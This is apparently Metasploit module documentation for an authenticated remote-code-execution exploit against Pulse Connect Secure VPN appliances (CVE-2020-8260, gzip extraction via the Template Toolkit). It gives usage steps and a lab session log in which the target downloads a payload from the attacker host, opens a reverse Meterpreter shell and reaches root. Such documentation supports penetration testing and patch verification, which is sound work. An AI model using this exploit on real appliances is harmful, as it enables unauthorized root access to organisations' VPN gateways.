## Vulnerable Application

The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability which allows an authenticated attacker
to overwrite arbitrary files, resulting in Remote Code Execution as root. Admin credentials are required for successful exploitation.

NCC Group [wrote](https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/)
in their findings a few different ways to achieve RCE through the gzip vulnerability. This exploit utilizes the Template Toolkit method
which works up to 9.1R8 (possibly more), whereas the other methods were patched earlier.  With this method, since the payload is sent in the perl
template, there are also no bad characters.

Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.  Thanks to @wvu for pointing that out.

Pulse Secure Connect trial can be downloaded [here](https://www.pulsesecure.net/trynow/pulse-connect-secure/).

## Verification Steps

1. Install the server
1. Start msfconsole
1. Do: `use exploit/linux/http/pulse_secure_gzip_rce`
1. Do: `set rhosts [IP]`
1. Do: `set username [username]`
1. Do: `set password [password]`
1. Do: `run`
1. You should get a root shell

## Options

### cmd

If this option is set, a single command will be run instead of the payload. Defaults to `` (empty)

## Scenarios

### Pulse Connect Secure 9.1R8 build 7453, Meterpreter Payload

```
msf6 > use exploit/linux/http/pulse_secure_gzip_rce 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set RHOSTS 192.168.159.100
RHOSTS => 192.168.159.100
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf6 exploit(linux/http/pulse_secure_gzip_rce) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/http/pulse_secure_gzip_rce) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/m6x4OtFXogsSCK
[*] Local IP: http://192.168.250.87:8080/m6x4OtFXogsSCK
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of XLQOBGKB
[*] Requesting backup config page
[*] Uploading encrypted config backup
[*] Triggering RCE
[*] Client 192.168.159.100 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /m6x4OtFXogsSCK
[*] Sending payload to 192.168.159.100 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:57548) at 2020-12-07 10:52:54 -0500
[*] Command Stager progress - 100.00% done (122/122 bytes)
[*] Logging out to prevent warnings to other admins
[*] Server stopped.

meterpreter > getuid
Server username: root @ localhost2 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.159.100
OS           :  (Linux 2.6.32-00025-g841d072-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```
